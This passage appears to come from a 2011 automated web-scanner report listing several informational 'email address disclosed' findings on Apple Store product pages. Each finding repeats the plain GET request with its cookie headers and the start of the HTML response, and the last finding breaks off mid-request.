Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:51 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:03:00 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
ETag: "848db5377e3c6ab211ad5ac6cd37a23b"
Vary: accept-encoding
Date: Thu, 03 Feb 2011 17:53:00 GMT
x-request-id: d2e8ba73-a764-4400-a342-8bb40ceb8d34
Content-Length: 91539
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>iSkin evo3 Duo for iPod classic (Eclipse Black) - Apple Stor
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.71. http://store.apple.com/us/product/TW256VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW256VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW256VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D1%2C; geo=US; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home/shop_ipod/family/ipod_classic/engrave%2526pidt%253D1%2526oid%253DMTA4NTI1NTY%2526oidt%253D1%2526ot%253DIMAGE%2526oi%253D1%26appleusmac%3D%2526pid%253Dmac%252520-%252520index%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:52:37 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:03:01 GMT
ETag: "9d75bd5b9970050c5b6c44c8aedd0932"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 17:53:01 GMT
x-request-id: afa22950-e9a3-454e-8471-43fdf4f36cf5
Content-Length: 92767
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>iSkin eVo4 Duo for iPod classic - Apple Store (U.S.)</title>
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.72. http://store.apple.com/us/product/TW682LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW682LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW682LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 17:48:00 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:36 GMT
ETag: "291631f8db377f9f782ab09e4adea689"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:36 GMT
x-request-id: a6db85dd-fe61-4196-a28f-f0a15a7a4ad9
Content-Length: 94627
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Monster iCarPlay Wireless 800 FM Transmitter for iPhone and
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.73. http://store.apple.com/us/product/TW683LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW683LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW683LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
x-request-id: 57c44cf3-d827-4b7e-83ca-f166ad5952e4
Cache-Control: private, max-age=600
Vary: accept-encoding
Expires: Thu, 03 Feb 2011 18:18:14 GMT
Last-Modified: Thu, 03 Feb 2011 18:06:35 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:08:14 GMT
Content-Length: 85491
ETag: "79e9b59c9893cdcbfa156e8da66e3ab5"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Monster iCarPlay Cassette 800 for iPhone and iPod - Apple St
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.74. http://store.apple.com/us/product/TW684LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW684LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW684LL/A?fnode=MTY1NDA2MQ&mco=MTA4ODAyNjU HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:07:56 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:20 GMT
content-type: text/html; charset=UTF-8; encoding=UTF8
Vary: accept-encoding
Date: Thu, 03 Feb 2011 18:08:20 GMT
x-request-id: 78e97597-ae86-45ad-a566-e433018a80de
Content-Length: 88625
ETag: "e49fc2395045aca1d8754fd854f2aa9a"
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Monster iCarCharger AUX 1000 for iPhone and iPod - Apple Sto
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.75. http://store.apple.com/us/product/TW685LL/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW685LL/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW685LL/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 18:08:12 GMT
Content-Type: text/html; charset=UTF-8; encoding=UTF8
x-request-id: 9b4d1e8f-29de-4039-905a-3dc5b6bc9291
Last-Modified: Thu, 03 Feb 2011 18:06:34 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:18:12 GMT
ETag: "87df36a79ba9607362fa80dfade504e5"
Vary: accept-encoding
Content-Length: 82475
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Monster iCable 800 for iPhone and iPod - Apple Store (U.S.)<
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.76. http://store.apple.com/us/product/TW908  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TW908

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TW908 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 03 Feb 2011 18:06:16 GMT
Cache-Control: private, max-age=600
Expires: Thu, 03 Feb 2011 18:17:48 GMT
ETag: "7b4641b170b51d04c0c75d2df632c9de"
Vary: accept-encoding
content-type: text/html; charset=UTF-8; encoding=UTF8
Date: Thu, 03 Feb 2011 18:07:48 GMT
x-request-id: f428e4a4-b484-402a-9f39-8c857ebe05e3
Content-Length: 95611
x-frame-options: sameorigin


<!DOCTYPE html>
<html class="en-us en us" lang="en-US">
<head>
<meta name="viewport" content="width=1024" />


<title>Marware Sportshell Convertible for iPhone 3GS - Apple Store
...[SNIP]...
<input name="mid" value="" type="email" maxlength="128" placeholder="example: steve@apple.com" />
...[SNIP]...

23.77. http://store.apple.com/us/product/TX239VC/A  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.apple.com
Path:   /us/product/TX239VC/A

Issue detail

The following email address was disclosed in the response:

Request

GET /us/product/TX239VC/A HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; 